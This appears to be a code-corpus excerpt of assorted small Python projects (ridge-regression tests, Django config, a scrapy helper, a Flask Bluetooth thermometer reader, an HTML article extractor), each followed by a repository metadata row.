"save": "",
"unicode": "true",
"long": "",
"production": "",
"unsafe_perm": "true",
"node_version": "v0.10.11",
"tag": "latest",
"shrinkwrap": "true",
"fetch_retry_factor": "10",
"npat": "",
"proprietary_attribs": "true",
"strict_ssl": "true",
"username": "",
"dev": "",
"globalconfig": "/home/action/.nvm/v0.10.11/etc/npmrc",
"init_module": "/home/action/.npm-init.js",
"parseable": "",
"globalignorefile": "/home/action/.nvm/v0.10.11/etc/npmignore",
"cache_lock_retries": "10",
"group": "26272",
"init_author_email": "",
"searchexclude": "",
"git": "git",
"optional": "true",
"json": ""
}
}
| [
"belfordz66@gmail.com"
] | belfordz66@gmail.com |
90631679a89c51ce0644b32bbe8d7946814c023f | e9b603b427004e745c864a0557f146e91eb5cd8d | /tests/test_ridge.py | c066f48fe0ef8d58aa4b19024e03a53d9943e528 | [] | no_license | dakloepfer/AIMS-Optimization-Labs | 7f38eb4ad68e7b5ae64b78530344bbf733cca99d | 12291ad0864d807319edc9acbbaa7d85d4fb7f63 | refs/heads/master | 2023-01-06T22:58:45.031909 | 2020-11-01T23:54:36 | 2020-11-01T23:54:36 | 307,413,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,010 | py | import unittest
from sys import argv
import numpy as np
import torch
from objective.ridge import Ridge, Ridge_ClosedForm, Ridge_Gradient
from .utils import Container, assert_all_close, assert_all_close_dict
def _init_ridge(cls):
    """Attach a small, reproducible ridge-regression fixture to *cls*.

    Seeds the numpy/torch RNGs, then stores the hyper-parameters
    (hparams), weights (w), inputs (x) and targets (y) as attributes.
    """
    np.random.seed(1234)
    torch.manual_seed(1234)
    feature_count, sample_count, regularization = 3, 5, 0.02
    cls.hparams = Container(n_features=feature_count,
                            n_samples=sample_count,
                            mu=regularization)
    # Draw order matters for reproducibility: w, then x, then y.
    cls.w = torch.randn(feature_count, 1, requires_grad=True)
    cls.x = torch.randn(sample_count, feature_count)
    cls.y = torch.randn(sample_count)
class TestObj_Ridge_ClosedForm(unittest.TestCase):
    """Checks the closed-form ridge objective against reference values."""

    def setUp(self):
        _init_ridge(self)
        self.obj = Ridge_ClosedForm(self.hparams)

    def test_error(self):
        actual = self.obj.task_error(self.w, self.x, self.y)
        assert_all_close(actual, torch.tensor(1.3251), "task_error returned value")

    def test_oracle(self):
        actual = self.obj.oracle(self.w, self.x, self.y)
        reference = {
            'sol': torch.tensor([[-0.2297], [-0.7944], [-0.5806]]),
            'obj': torch.tensor(1.3370),
        }
        assert_all_close_dict(reference, actual, "oracle_info")
class TestObj_Ridge_Gradient(unittest.TestCase):
    """Checks the gradient-based ridge objective against reference values."""

    def setUp(self):
        _init_ridge(self)
        self.obj = Ridge_Gradient(self.hparams)

    def test_error(self):
        actual = self.obj.task_error(self.w, self.x, self.y)
        assert_all_close(actual, torch.tensor(1.3251), "task_error returned value")

    def test_oracle(self):
        actual = self.obj.oracle(self.w, self.x, self.y)
        reference = {
            'dw': torch.tensor([[0.7323], [1.4816], [-0.3771]]),
            'obj': torch.tensor(1.3370),
        }
        assert_all_close_dict(reference, actual, "oracle_info")
if __name__ == '__main__':
    # Forward the interpreter's CLI arguments (e.g. -v) to unittest.
    unittest.main(argv=argv)
| [
"dominikkloepfer@dhcp-90.wolf.ox.ac.uk"
] | dominikkloepfer@dhcp-90.wolf.ox.ac.uk |
0df083b0ca211010f1b8aea908d87a5d511217b2 | 71f55ebd4ba04997fb393704927098fb3071a1f9 | /test/__init__.py | 1a474a2e7a92bb9cda661a8da773b2c889a4fe8e | [] | no_license | dattatembare/ngo-data | ba1e82dbb9347dc08aa5849c871b6f5df3a8baa5 | 9b833ab28e3a4db3a0caf7a71f253ce7453bc41d | refs/heads/master | 2022-12-16T16:31:23.435449 | 2020-12-24T16:02:53 | 2020-12-24T16:02:53 | 246,443,022 | 1 | 0 | null | 2022-12-08T06:19:22 | 2020-03-11T01:07:09 | Python | UTF-8 | Python | false | false | 222 | py | import os
import sys
# This path setup is very important when you have src and test under the main
# directory: it lets the test modules import the code in ../src without the
# package being installed.
current_dir = os.path.dirname(__file__)
sys.path.insert(0, current_dir)
sys.path.insert(0, current_dir + '/../src')
| [
"dtembare@solutechnology.com"
] | dtembare@solutechnology.com |
a95fa81f5efdfcd29c79fad33a30a88eff514425 | e243a941f5564008f68306ca32af3deffb427ba7 | /assignment1/.env/bin/ipython | 84d11e9477b05da76b01ebd9e2a7641b67aa0e71 | [] | no_license | jingxia/NLP_DL | c7a25e5914a974acccf750e9ef4bb90d81f77423 | e0288103373b781e0fdaab3f938fe27daff688ea | refs/heads/master | 2021-01-01T03:48:15.118733 | 2016-05-14T22:30:59 | 2016-05-14T22:30:59 | 58,833,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | #!/Users/jing/PycharmProjects/NLP_DL/assignment1/.env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from IPython import start_ipython
if __name__ == '__main__':
    # setuptools-style console script: strip a "-script.pyw"/".exe" suffix
    # from argv[0], then hand control (and the exit code) to IPython.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(start_ipython())
| [
"jingxia615@gmail.com"
] | jingxia615@gmail.com | |
1cdc7ec466731235e82f795288e717540ca4a629 | 64fe3e798b8cb6a34314f5044606a8d102828f43 | /hackhaton/hackhaton/wsgi.py | 3dc9a18c54f846d2f9f3ce5d098fe83498b614f4 | [] | no_license | jlga94/hackhaton_django | 821a375042dd1846d8fa38cdbc59f235d6a1bdc7 | 197dc2dd00a8a1ebcf4abe7502245de103b0abb2 | refs/heads/master | 2021-09-05T17:07:09.261417 | 2018-01-29T21:51:48 | 2018-01-29T21:51:48 | 114,500,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | """
WSGI config for hackhaton project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at this project's settings module before building the app.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hackhaton.settings")
# Module-level WSGI callable picked up by servers (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
| [
"jose.gil@pucp.pe"
] | jose.gil@pucp.pe |
6e8da8e397cef33da10c132cc14befac799d08b6 | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_exercises/templates/_algorithms_challenges/pybites/intermediate/030_movie_data_analysis/save1_nopass.py | de9624e5838b09cfbf6dd63a838b4df2ba2feb25 | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 1,495 | py | # _______ c__
# ____ c.. _______ d.., n..
# _______ __
# ____ u__.r.. _______ u..
#
# BASE_URL 'https://bites-data.s3.us-east-2.amazonaws.com/'
# TMP '/tmp'
#
# fname 'movie_metadata.csv'
# remote __.p...j.. B.. f..
# local __.p...j.. T.. f..
# u.. ? ?
#
# MOVIE_DATA local
# MIN_MOVIES 4
# MIN_YEAR 1960
#
# Movie n.. 'Movie', 'title year score'
#
#
# ___ get_movies_by_director
# """Extracts all movies from csv and stores them in a dict,
# where keys are directors, and values are a list of movies,
# use the defined Movie namedtuple"""
#
# d d.. l..
# full_list # list
#
# w__ o.. M.. newline='' __ file
# reader c__.D.. ?
# ___ row __ ?
# year ? 'title_year'
# __ ? !_ '' a.. i.. ? > 1960
# f__.a.. ? 'director_name' ? 'movie_title' .s.. i.. ? 'title_year' f__ ? 'imdb_score'
#
# ___ name, movie, year, score __ f..
# d name .a.. ? t.._m.. y.._y.. s.._s..
#
# r.. ?
#
#
# ___ calc_mean_score movies
# """Helper method to calculate mean of list of Movie namedtuples,
# round the mean to 1 decimal place"""
# scores movie.s.. ___ ? __ ?
# r.. r.. s.. ? / l.. ? 1
#
# ___ get_average_scores directors
# """Iterate through the directors dict (returned by get_movies_by_director),
# return a list of tuples (director, average_score) ordered by highest
# score in descending order. Only take directors into account
# with >= MIN_MOVIES"""
#
# p..
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
296ac53495121ded2eaac5581cfbda578198a783 | 04da06b04f9e3b2718aa63c9bf6eebc849978ba4 | /scripts/2018-2019/2018 AY papers/misc/randomdebug.py | 1deeb3285f46ce12737cee05ed837ffd1962f6e9 | [
"Apache-2.0"
] | permissive | seccode/havsim | 791434b724a3c4e70ad2300b95bf4efa9311c415 | 0aaf9674e987822ff2dc90c74613d5e68e8ef0ce | refs/heads/master | 2023-03-13T01:01:46.204165 | 2021-02-24T06:26:03 | 2021-02-24T06:26:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,782 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Dec 31 16:03:45 2018
@author: rlk268
"""
from calibration import *
##out,out2 = r_constant(rinfo[0],platooninfo[562][1:3],platooninfo[562][3],45)
#
##leadinfo,folinfo,rinfo = makeleadfolinfo_r5(curplatoon,platooninfo,sim)
#sim = copy.deepcopy(meas)
#platoons = [[],1013]
#
#pguess = [20,1,8,3.3,12]
#leadinfo,folinfo,rinfo = makeleadfolinfo(platoons, platooninfo, meas)
##platoonobjfn_objder(p,*(OVM, OVMadjsys, OVMadj, meas, sim, platooninfo, platoons, leadinfo, folinfo,rinfo,True,6))
#
#blah = platoonobjfn_objder(test,*(IDM, IDMadjsys, IDMadj, meas, sim, platooninfo, platoons, leadinfo, folinfo,rinfo))
#print(blah)
#%%
#sim = copy.deepcopy(meas)
#platoons = [[],1013]
#
#pguess = [0,60,5]
#leadinfo,folinfo,rinfo = makeleadfolinfo_r3(platoons, platooninfo, meas)
##platoonobjfn_objder(p,*(OVM, OVMadjsys, OVMadj, meas, sim, platooninfo, platoons, leadinfo, folinfo,rinfo,True,6))
#
#blah = TTobjfn_obj(pguess,*(None, None, None, meas, sim, platooninfo, platoons, leadinfo, folinfo,rinfo,True,3))
#%% make sure newell works with the calibrate_bfgs function
#from calibration import *
#platoonlist = [[[],969]]
#
#plist = [[1.5,60,5],[2.5,100,60],[2,150,60]]
#mybounds = [(0,5),(5,200),(.1,75)]
#
#test = calibrate_bfgs(plist,mybounds,meas,platooninfo,platoonlist,makeleadfolinfo_r3,TTobjfn_obj,TTobjfn_fder,None,None,None,True,3,cutoff = 0,delay = True,dim=1)
#from calibration import *
#platoonlist = [[[],603]]
#
#plist = [[1.5,60,5,5],[2.5,100,60,60],[2,150,60,60]]
#mybounds = [(0,5),(5,200),(.1,75),(.1,75)]
#
#test = calibrate_bfgs(plist,mybounds,meas,platooninfo,platoonlist,makeleadfolinfo_r3,TTobjfn_obj,TTobjfn_fder,None,None,None,True,4,True,cutoff = 0,delay = True,dim=1)
#%%
#from calibration import *
#
#platoonlist = [[[],603]]
#plist = [[40,1,1,3,10],[60,1,1,3,10],[80,1,15,1,1]]
##plist = [[40,1,1,3,10,25],[60,1,1,3,10,5],[80,1,15,1,1,5]]
##plist = [[40,1,1,3,10,25,25],[60,1,1,3,10,5,5],[80,1,15,1,1,5,5]]
#mybounds = [(20,120),(.1,5),(.1,35),(.1,20),(.1,20)]
#
#test = calibrate_bfgs(plist,mybounds,meas,platooninfo,platoonlist,makeleadfolinfo,platoonobjfn_objder,None,IDM_b3,IDMadjsys_b3,IDMadj_b3,False,5,cutoff = 0,delay = False,dim=2)
#%%
#need to be a little bit careful with plotting when the linesearch fails because of the time delay.
#with open('LCtest5.pkl','rb') as f:
# merge_nor, merge_r, merge_2r,mergeLC_r, mergeLC_2r = pickle.load(f)
#sim = copy.deepcopy(meas)
#obj = TTobjfn_obj(bfgs[0],*(None, None, None, meas, sim, platooninfo, curplatoon, leadinfo, folinfo,rinfo,True,4,True,True))
#re_diff(sim,platooninfo,curplatoon,delay = bfgs[0][0])
#%%
#SEobj_pervehicle(meas,sim,platooninfo,curplatoon)
from calibration import *
# NOTE(review): scratch/debug invocation — `data` is not defined anywhere in
# this script; presumably it exists in the interactive session this file was
# executed in (cell-mode usage). Confirm before running standalone.
meas2,followerchain = makefollowerchain(956,data,15)
| [
"rlk268@cornell.edu"
] | rlk268@cornell.edu |
f6781a69e1b2ae0d198cc5c11ac27d5d185fa49e | c3cc755ae500e87b6d5fa839efaa4d7d0f746d43 | /Part 1/Ch.6 Dictionaries/Nesting/pizza.py | f07401d2bb54c94f78013b95d7f88cd48287e6fd | [] | no_license | AngryGrizzlyBear/PythonCrashCourseRedux | 9393e692cdc8e5e28a66077bbc6c1e674642d209 | 28d48fa16fc238cf0409f6e987a3b4b72e956a92 | refs/heads/master | 2020-03-28T11:04:44.030307 | 2018-10-20T21:06:27 | 2018-10-20T21:06:27 | 148,175,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | # Store information about a pizza being ordered.
# Details of the pizza that was ordered.
pizza = {
    'crust': 'thick',
    'toppings': ['mushrooms', 'extra cheese'],
}
# Recap the order back to the customer.
print("You ordered a {}-crust pizza "
      "with the following toppings:".format(pizza['crust']))
for topping in pizza['toppings']:
print("\t" + topping) | [
"evanmlongwood@gmail.com"
] | evanmlongwood@gmail.com |
dd72b8bc7f5980ef8d3cb54b0675f06925816d22 | 8ca34426e2260877d2085c7b39ffe8bca935849a | /Practica 5/Ejercicio 4.py | f9bd1abf24bea0fe60395aed16369bf32c1d375e | [] | no_license | RDAW1/Programacion | 14f12d9d2f11ecc83cf0d4194152564da0655034 | 2dc48538e70faa611e2616ff9953117325e680b8 | refs/heads/master | 2021-08-14T20:10:41.540800 | 2017-11-16T17:19:47 | 2017-11-16T17:19:47 | 107,440,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | print 'Escribe un numero'
a=input()
# Start the list with the first number, then keep prompting until the user
# enters a strictly larger one (Python 2 input()/print syntax).
li=[a]
print 'Escribe otro numero mayor que' ,(a)
b=input()
while b<=a:
    print (b), 'no es mayor que' ,(a)
    b=input()
    li=li+[b]
# NOTE(review): values of b are appended only when re-read inside the loop,
# so a b accepted on the very first attempt never makes it into li — looks
# unintended; confirm.
print 'Los numeros que has escrito son' ,(li)
| [
"noreply@github.com"
] | RDAW1.noreply@github.com |
4f7d5a85a420de08e9bf9fc111057990ab60620f | 445b3c4e1b9a79d438f141a227b8f235d5b172e5 | /day11_装饰器/demo_03_最简单的装饰器.py | 4b4463e99486e4f6dab6995705297c2616bc92f7 | [] | no_license | fengzongming/python_practice | d835b1164041ac68e6cd8cb6cd8c370033da84fa | 82d0449e46c41798d2361c37ed47f028a956439e | refs/heads/master | 2020-04-09T19:42:18.076487 | 2019-01-17T17:36:14 | 2019-01-17T17:36:14 | 160,551,026 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 588 | py | """
Decorator types:
    1. The simplest decorator
    2. A decorator whose wrapped function returns a value
    3. A decorator for a function taking one argument
    4. A decorator accepting arbitrary arguments
What decorators are for:
    Adding functionality to a function without modifying its source code
Syntactic sugar: @
"""
import time
def timmer(f):
    """Decorator that prints the wall-clock run time of *f* on every call.

    Generalized (backward-compatibly) to forward arbitrary positional and
    keyword arguments and to return *f*'s return value; the previous
    inner() only supported zero-argument functions and discarded the
    result.
    """
    def inner(*args, **kwargs):
        start_time = time.time()
        result = f(*args, **kwargs)
        end_time = time.time()
        print("函数执行时间为:", end_time - start_time)
        return result
    return inner
@timmer
def func():
    """Demo function: sleep briefly, then print a greeting."""
    time.sleep(0.01)
    print("hello 装饰器")
# func = timmer(func)  -- this is what the @timmer line above expands to
func()
| [
"956626817@qq.com"
] | 956626817@qq.com |
c7a5b452be9c4a1b287984eeb33a1fc8a65faa85 | a8901bc908624f154883f4d3da224ab6ef2ad3f3 | /utils.py | 647bc6ccbe76000defbd2a3e3601e1977abf8482 | [] | no_license | hieuddo/ml-project | a7213c6cdfa1e36e877ed275da381ac330e49ebf | 05e4062ce5f0db3c7db4d861cbffbb119470b005 | refs/heads/master | 2022-11-17T11:50:01.188976 | 2020-07-12T06:25:44 | 2020-07-12T06:25:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,246 | py | import os
import pandas as pd
def set_start_url(url):
    """Copy scraper-draft.py to scraper.py, injecting *url* into line 6.

    Line 6 (index 5) of the draft is expected to end in two characters
    (e.g. "]\\n"); the quoted URL is spliced in just before them.
    """
    with open('scraper-draft.py', 'r') as draft, open('scraper.py', 'w') as target:
        for line_number, line in enumerate(draft.readlines()):
            if line_number == 5:
                line = line[:-2] + "'{0}'".format(url) + line[-2:]
            target.write(line)
def run_spider(out_file='out.json'):
    """Delete any stale *out_file*, then invoke scrapy to regenerate it."""
    if os.path.exists(out_file):
        os.remove(out_file)
    try:
        os.system('scrapy runspider -o {0} scraper.py'.format(out_file))
    # NOTE(review): bare except preserved from the original — it swallows
    # everything, including KeyboardInterrupt.
    except:
        pass
def predict_posts(cls, file='out.json'):
    """Classify scraped posts and collect the ones flagged by the model.

    Reads the spider's JSON output from *file*, skips row 0, and runs
    ``cls.predict`` on each post's text; posts with a non-zero label
    (1 = offensive language, otherwise hate speech) are appended to the
    resulting DataFrame.
    """
    posts = pd.read_json(file)
    out_df = pd.DataFrame(
        columns=['User', 'Post URL', 'Content', 'Is hate speech?', 'Ignore User'])
    flagged_count = 0
    # Row 0 is deliberately skipped, mirroring the spider's output layout.
    for row_index in range(1, posts.shape[0]):
        post = posts.iloc[row_index]
        label = cls.predict(post.text)[1].cpu().numpy()
        if label != 0:
            verdict = 'Offensive Language' if label == 1 else 'Hate speech'
            out_df.loc[flagged_count] = [post.user, post.link, post.text, verdict, post.ignore]
            flagged_count += 1
return out_df | [
"hieu.dd.1998@gmail.com"
] | hieu.dd.1998@gmail.com |
56a437554e13be743bb4c7518a134f99721129e8 | 468a5b0be968b4d0ebd66ffbdcdc0b61279286b3 | /tags/migrations/0001_initial.py | 053815b2bc3a416fecdfb6e8cd209b0138bff80c | [] | no_license | ARHAM30/Ecommerce-django | 85cd4385c0aa95284b9051b3fbdee074a828cfc8 | 2131dae4452dbeea3345fffd0f63a14ba62bc15b | refs/heads/master | 2020-08-17T17:47:01.588922 | 2020-01-22T03:09:32 | 2020-01-22T03:09:32 | 215,693,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | # Generated by Django 2.2.4 on 2019-10-23 11:34
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django (2.2.4): initial migration for the tags app,
    # creating the Tag model.
    initial = True
    dependencies = [
        # Tag.products is an M2M to product.Product, so that app's
        # migration must be applied first.
        ('product', '0004_auto_20191023_1635'),
    ]
    operations = [
        migrations.CreateModel(
            name='Tag',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=120)),
                ('slug', models.SlugField()),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('active', models.BooleanField(default=True)),
                ('products', models.ManyToManyField(blank=True, to='product.Product')),
            ],
        ),
    ]
| [
"arhambaig977@gmail.com"
] | arhambaig977@gmail.com |
5a7f707773146c6ee40d27fc4da4971ee2f9ea24 | fbfd842136ce51a598801d1db8a383633f6ef65b | /CP/Competetive Programming And DSA/hwiPolice.py | a27aab90cb9b4e208ca0e3b1b7c591d30b85a251 | [] | no_license | jayz25/MiniProjects-And-CP | 6d74fd1b58d10036235520a1d10d928f45d5d542 | 40eb2f0f3449e77e02424fcc8fa80597f2a83bf6 | refs/heads/master | 2023-06-11T03:04:50.348564 | 2021-06-20T18:42:55 | 2021-06-20T18:42:55 | 366,385,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | n = int(input())
k = int(input())
# Fixed input pattern; the meaning of the 0/1 entries is not documented
# anywhere in this script — TODO confirm (n is read on the truncated first
# line above).
arr = [0,1,0,0,1,0]
stack = []
i = 0
while(i<n):
    if arr[i]==0:
        # Plain position: push the 1-based index.
        stack.append(i+1)
        print(stack)  # debug output
        i += 1
    else:
        # Pop up to k entries, silently tolerating an empty stack, then
        # push the current 1-based position.
        for _ in range(k):
            try:
                stack.pop()
            except IndexError:
                pass
            print("for",stack)  # debug output
        stack.append(i+1)
        i = i + 1
print(sum(stack))
| [
"patiljayesh026@gmail.com"
] | patiljayesh026@gmail.com |
bdd426918d251d7936aa6a4edb1a186df0ccf340 | a090c4acc00adab3efc1825bf281dd8e82e3e69f | /pixelate/mosaic_style/abstract_mosaic_style.py | 40e3710884dc85bc82c3a51f274880e7a34ad00a | [] | no_license | huhudev-git/tus-image-project | c3da1d9b42b0c5816377c2cab286a0424324215d | 55c4b4a09bd7dfbff95a4f999649b14f69738ccf | refs/heads/main | 2023-03-28T11:49:52.230660 | 2021-03-31T08:40:04 | 2021-03-31T08:40:04 | 315,810,774 | 0 | 0 | null | 2021-03-31T08:41:41 | 2020-11-25T02:48:05 | JavaScript | UTF-8 | Python | false | false | 205 | py | import abc
class AbstructMosaicStyle(abc.ABC):
    """Style parameters for a mosaic pattern (abstract base class).

    Note: the misspelling "Abstruct" is kept for backward compatibility
    with existing imports.
    """

    # abc.abstractclassmethod has been deprecated since Python 3.3; the
    # supported spelling is @classmethod stacked on @abc.abstractmethod.
    @classmethod
    @abc.abstractmethod
    def from_json(cls, json_data):
        """Build a style instance from parsed JSON data.

        Subclasses must override this; the default simply constructs the
        class with no arguments.
        """
        return cls()
| [
"contact@huhu.dev"
] | contact@huhu.dev |
5a92d4ab1cc807439b41619bcfda92f6a5fe48e4 | 3d0f970843c75e9885d3ce3e72cf4b12e9c2cc06 | /googleform/migrations/0009_auto_20200624_1840.py | e851beb3c287ff0b0b52657b4ec3066733bea6a5 | [] | no_license | shantanuatgit/applicationform | 69556dc3b89cf602dfc074c5a33f07983d94f615 | 3e2ca8200f5bd695342906e7622b64955130173a | refs/heads/master | 2022-11-18T06:19:12.155255 | 2020-07-20T04:21:29 | 2020-07-20T04:21:29 | 281,011,154 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | # Generated by Django 2.0.2 on 2020-06-24 13:10
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django: changes cvmodel.file1 to a FileField that
    # stores uploads under 'uploads/'.
    dependencies = [
        ('googleform', '0008_auto_20200621_2049'),
    ]
    operations = [
        migrations.AlterField(
            model_name='cvmodel',
            name='file1',
            field=models.FileField(upload_to='uploads/'),
        ),
    ]
| [
"shantanu3250@.com"
] | shantanu3250@.com |
f233566bc0209e6c8a219974fc105d441148d00f | d4fa412e7628f18b66f3c26588c68ec346356bb3 | /main.py | 2de819593c913d9fb0764c2f3b27904980e6ae13 | [] | no_license | MohammadNazier/Flask-Thermometer-reader | 43251a80f1812973492f3404f8d9c1ba5166427c | cb346af70adac2e4eb57721c15abea54bb0aaca5 | refs/heads/main | 2023-08-28T22:38:05.718539 | 2021-11-01T15:17:15 | 2021-11-01T15:17:15 | 421,877,879 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,017 | py |
from flask import Flask #need to install
from lywsd03mmc import Lywsd03mmcClient #need to install
from load_json import read_json
from time import gmtime, strftime
app = Flask(__name__)
@app.route("/temp")
def temperature():
    """Poll every configured LYWSD03MMC sensor over Bluetooth and return an
    HTML snippet with per-room temperature, humidity and battery readings.
    """
    mac_ads, room = read_json()
    all_text = ""
    for eath in range(len(mac_ads)):
        header = ('<p>'+room[eath]+' '+'<p>'+mac_ads[eath]+'<br><br>')
        mac_ad = (mac_ads[eath])
        # NOTE(review): the BLE client is connected but never disconnected —
        # presumably leaks one connection per sensor per request; confirm.
        client = Lywsd03mmcClient(mac_ad)
        client.connect()
        data = client.data
        all_text = all_text + "<br>"+strftime("%Y-%m-%d %H:%M:%S", gmtime())+ header + ('Temperature: ' + str(data.temperature) +' <br> '
                                                                                        +'Humidity: ' + str(data.humidity)+' <br> '+'Battery: ' + str(data.battery)+' <br> '
                                                                                        +'Display units: ' + client.units)+'<br>__________________________'
    return all_text
if __name__ == "__main__":
    app.run(host='0.0.0.0', port = 8333, threaded = True, debug = True) # try app.run() without args if you want to run the app locally
| [
"naz@naz.com"
] | naz@naz.com |
a381405f3e7de92702f28ddc67b8a4d3d57494cd | 7bd5ca970fbbe4a3ed0c7dadcf43ba8681a737f3 | /aoj/aoj-icpc/300/1315.py | fc47a7e25bc9e18a6c15f3d4e5a4aeac5a025693 | [] | no_license | roiti46/Contest | c0c35478cd80f675965d10b1a371e44084f9b6ee | c4b850d76796c5388d2e0d2234f90dc8acfaadfa | refs/heads/master | 2021-01-17T13:23:30.551754 | 2017-12-10T13:06:42 | 2017-12-10T13:06:42 | 27,001,893 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | while 1:
    n = int(raw_input())
    if n == 0: break
    # Per-dataset bookkeeping: `exist` holds the ids currently inside,
    # enter[p] is person p's latest entry time (minutes since midnight),
    # bless[p] accumulates the total time p has spent together with id 0.
    exist = set([])
    enter = [0]*1000
    bless = [0]*1000
    for loop in xrange(n):
        md,hm,io,p = raw_input().split()
        h,m = map(int,hm.split(":"))
        t = 60*h+m
        p = int(p)
        if io == "I":
            enter[p] = t
            exist.add(p)
        else:
            exist.remove(p)
            if p == 0:
                # Id 0 leaves: credit everyone still present with the
                # overlap since the later of the two entry times.
                for i in exist: bless[i] += t-max(enter[p],enter[i])
            elif 0 in exist:
                # Someone else leaves while 0 is present: credit them.
                bless[p] += t-max(enter[0],enter[p])
    print max(bless)
| [
"roiti46@gmail.com"
] | roiti46@gmail.com |
9bda09594d5730e2c39a6b22d8055f740cd68790 | 5c869e507e968eeb8ce4a4f8a3dae0ef04163185 | /docassist/test.py | 2bfd70151634cf657b97be840999f1feb8c43bca | [] | no_license | priyanshsaxena/DocAssist | c40ccc5fdb1cb3f870676d0de70d0039ee67c65b | 26b8cbb5be3a6b2f01505b994cae38cf63297e71 | refs/heads/master | 2021-01-22T05:47:44.854456 | 2017-02-12T07:08:51 | 2017-02-12T07:08:51 | 81,707,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,981 | py | """
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from xml.sax.saxutils import escape
import urllib, re, os, urlparse
import HTMLParser, feedparser
from BeautifulSoup import BeautifulSoup
from pprint import pprint
import codecs
import sys
# Wrap stdout in a utf-8 writer so article text prints cleanly (Python 2).
streamWriter = codecs.lookup('utf-8')[-1]
sys.stdout = streamWriter(sys.stdout)
HN_RSS_FEED = "http://news.ycombinator.com/rss"
# class/id name patterns that penalize or reward candidate containers.
NEGATIVE = re.compile("comment|meta|footer|footnote|foot")
POSITIVE = re.compile("post|hentry|entry|content|text|body|article")
# Characters replaced with "_" when deriving cache filenames from URLs.
PUNCTUATION = re.compile("""[!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~]""")
def grabContent(link, html):
	"""Extract the main readable content block from an HTML page.

	Readability-style heuristic: every parent of a <p> tag accumulates
	points for content-like class/id names and for long, comma-rich
	paragraphs, and loses points for comment/footer-like names; the best
	scoring parent is cleaned up and returned as an HTML string ("" on
	parse failure or when no candidate exists).
	"""
	# Normalize double <br>s into paragraph breaks so they count as <p>.
	replaceBrs = re.compile("<br */? *>[ \r\n]*<br */? *>")
	html = re.sub(replaceBrs, "</p><p>", html)
	try:
		soup = BeautifulSoup(html)
	except HTMLParser.HTMLParseError:
		return ""
	# REMOVE SCRIPTS
	for s in soup.findAll("script"):
		s.extract()
	allParagraphs = soup.findAll("p")
	topParent = None
	parents = []
	for paragraph in allParagraphs:
		parent = paragraph.parent
		if (parent not in parents):
			parents.append(parent)
			parent.score = 0
			# Score class/id names against the NEGATIVE/POSITIVE patterns.
			if (parent.has_key("class")):
				if (NEGATIVE.match(parent["class"])):
					parent.score -= 50
				if (POSITIVE.match(parent["class"])):
					parent.score += 25
			if (parent.has_key("id")):
				if (NEGATIVE.match(parent["id"])):
					parent.score -= 50
				if (POSITIVE.match(parent["id"])):
					parent.score += 25
		if (parent.score == None):
			parent.score = 0
		# Long, comma-rich paragraphs are strong signals of body text.
		innerText = paragraph.renderContents() #"".join(paragraph.findAll(text=True))
		if (len(innerText) > 10):
			parent.score += 1
			parent.score += innerText.count(",")
	for parent in parents:
		if ((not topParent) or (parent.score > topParent.score)):
			topParent = parent
	if (not topParent):
		return ""
	# REMOVE LINK'D STYLES
	styleLinks = soup.findAll("link", attrs={"type" : "text/css"})
	for s in styleLinks:
		s.extract()
	# REMOVE ON PAGE STYLES
	for s in soup.findAll("style"):
		s.extract()
	# CLEAN STYLES FROM ELEMENTS IN TOP PARENT
	for ele in topParent.findAll(True):
		del(ele['style'])
		del(ele['class'])
	# Drop boilerplate containers and make relative links absolute.
	killDivs(topParent)
	clean(topParent, "form")
	clean(topParent, "object")
	clean(topParent, "iframe")
	fixLinks(topParent, link)
	return topParent.renderContents()
def fixLinks(parent, link):
	"""Make every href/src under *parent* absolute, resolved against *link*."""
	for node in parent.findAll(True):
		if (node.has_key("href")):
			node["href"] = urlparse.urljoin(link, node["href"])
		if (node.has_key("src")):
			node["src"] = urlparse.urljoin(link, node["src"])
def clean(top, tag, minWords=10000):
	"""Drop every <tag> element below *top* whose rendered contents hold
